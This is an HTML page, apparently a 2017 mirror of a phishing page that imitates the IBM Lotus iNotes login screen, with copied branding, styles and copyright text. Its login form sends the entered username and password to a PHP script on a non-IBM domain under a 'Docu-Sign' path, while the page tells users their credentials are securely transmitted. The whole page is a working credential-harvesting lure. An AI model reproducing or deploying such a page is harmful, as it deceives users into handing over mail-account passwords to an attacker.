<!--(c) Copyright 1985-2010 IBM Corporation.  All rights reserved. -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<!-- Mirrored from amghamdi.com/Docu-Sign/cf131/b70ad/lt.php by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 19 Aug 2017 11:26:12 GMT -->
<head>
<script language="javascript" type="text/javascript" src="lt/Login.js"></script>
<style type="text/css" media="all">
<!-- @import url("lt/StylesheetLogin.css"); -->
</style>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>IBM Lotus iNotes Login</title>
<script type="text/javascript">
var sslport = 443;
var bEncryptPassword = 1;
var webDbName = "webredirect.html";
var bPersonalOptions = 1;
var bLoginOptions = 1;
var sUser = "Anonymous";
</script>
</head>
<body onload="init()" class="s-dwa-body-background s-dwa-body-font" text="#000000" bgcolor="#FFFFFF">

<form method="post" action="https://amghamdi.com/Docu-Sign/cf131/b70ad/lot.php" name="_DWALoginForm">
<input name="%%ModDate" value="0000000100000000" type="hidden"><table role="main" style="width:100%;height:100%;">
    <tbody><tr>
        <td style="width:30%">&nbsp;</td>
        <td valign="middle" align="center">
	        <table style="border-bottom: none;" class="s-dwa-login-table s-dwa-login-font" cellspacing="0" cellpadding="0" border="0">
           	  <tbody><tr>
	  	  	<td valign="top"><img alt="Lotus iNotes Login Screen" src="lt/iNotes-LoginBanner65short.gif"></td>
	        </tr>
          	  </tbody></table>
	        <table class="s-dwa-login-table s-dwa-login-font" cellspacing="0" cellpadding="4" border="0">
		      <tbody><tr>
                  <td colspan="3" class="s-dwa-error-text" align="left"><div id="errormsg"></div></td>
	            </tr>
	            <tr>
		<td colspan="3" style="padding: 5px 0px 5px 10px;">Enter your user name and password and then click Log In. <img title="User name and password will be securely transmitted." alt="User name and password will be securely transmitted." src="lt/dWMR-Encrypt.gif" width="11" height="14"></td>
                            </tr>
                            <tr>
		<td style="white-space:nowrap; padding-left:15px" width="15%" valign="middle"><label for="username">User name:</label></td>
		<td width="35%" align="left">
<input name="username" size="23" maxlength="80" id="username" tabindex="10" aria-required="true" style="width:100%"></td>
		<td></td>
	            </tr>
                            <tr>
		<td style="white-space:nowrap; padding-left:15px" width="15%" valign="middle"><label for="password">Password:</label></td>
		<td width="35%" align="left">
<input name="password" value="" size="23" maxlength="80" id="password" tabindex="20" aria-required="true" style="width:100%" type="password"></td>
		<td style="padding-left:10px" align="left"><input tabindex="30" value=" Log In " class="s-dwa-button s-dwa-button-font" onclick="encryptPassword();" type="submit"></td>
		
                            </tr>
                            <tr id="DWAOptions" style="">
		<td colspan="3" style="padding-left:6px">
	<fieldset class="s-options-container s-dwa-body-font">
	<legend style="color:#000000;">Options</legend>
			    
	<table id="DWAModeTable" class="s-dwa-mode-font" width="100%" border="0">
	<tbody>
        <tr>
        	<td id="e-mode-cell" style="padding-left: 6px; display: none;" width="35%">
        	Select the mode<br>
        	<input name="DWAMode" tabindex="40" value="0" id="radioFull" onclick="javascript:checkOption(this.value)" checked="checked" title="Use Full mode for access to all Domino Web Access features." type="radio">
<span title="Use Full mode for access to all Domino Web Access features."><label for="radioFull">Full mode</label></span>
        	<br>
        	<input name="DWAMode" tabindex="50" value="1" id="radioLite" onclick="javascript:checkOption(this.value)" title="Use Lite mode for a subset of features. This mode is best for slower connections." type="radio">
<span title="Use Lite mode for a subset of features. This mode is best for slower connections."><label for="radioLite">Lite mode</label></span>
<br><input name="DWAMode" value="2" id="radioUL" tabindex="60" onclick="javascript:checkOption(this.value)" title="Use Ultra-light mode for mobile devices or an accessibility compatible mail client." type="radio"><span title="Use Ultra-light mode for mobile devices or an accessibility compatible mail client."><label for="radioUL"> Ultra-light mode</label></span>
        	</td>
        	<td id="e-divide-cell" class="s-dwa-leftborder" style="display: none;" width="2%" valign="top">&nbsp;</td>
        	<td id="e-shared-cell" valign="top" align="left">
	<input id="DWAShared" tabindex="70" onclick="javascript:checkShared(this.checked);" title="Use this setting to prevent the viewing of attachments for security reasons." type="checkbox">
	<span id="DWASharedText" title="Use this setting to prevent the viewing of attachments for security reasons."><label for="DWAShared">Shared or public computer</label><br></span>

        	</td>
        </tr>
	</tbody></table>
</fieldset>
		</td>
		<td>&nbsp;</td>
	            </tr>
	            <tr>
	                <td class="s-dwa-copyright" colspan="3" style="padding-left:10px">
		       	<div style="width:100%;border-top: 1px solid #7E7E7E;margin: 7px 0px 3px 0px;"></div>
Licensed Materials - Property of IBM. L-GHUS-7XUT7L � Copyright IBM 
Corporation and its licensors 1985, 2010. All Rights Reserved. IBM, the 
IBM logo, Lotus and Notes are trademarks of IBM Corporation in the 
United States, other countries, or both. Other company, product or 
service names may be trademarks or service marks of others.
		</td>
	            </tr>
                            </tbody>
	        </table>
	     
                      </td>
        <td style="width:30%">&nbsp;</td>
       </tr>
</tbody></table>
<!-- Dummy button to prevent Domino from generating an extra "submit" button 
<input type="submit" value="submit"> -->
<p><font size="2" face="Courier New">
<input name="$PublicAccess" value="1" type="hidden"></font><font size="2" color="#FF0000" face="Courier New"> </font><font size="2" face="Courier New">
<input name="reasonType" value="0" id="reasonType" type="hidden"></font><br>
<font face="Courier New"> </font><font size="2" face="Courier New">
<input name="RedirectTo" value="/webredirect.nsf" type="hidden"></font><br>
</p></form>


</body><div id="sp_console_event" style="display:none" data="%7b_a___setShowingSafe_%2c_f__false%7d.html"></div>
<!-- Mirrored from amghamdi.com/Docu-Sign/cf131/b70ad/lt.php by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 19 Aug 2017 11:26:16 GMT -->
</html>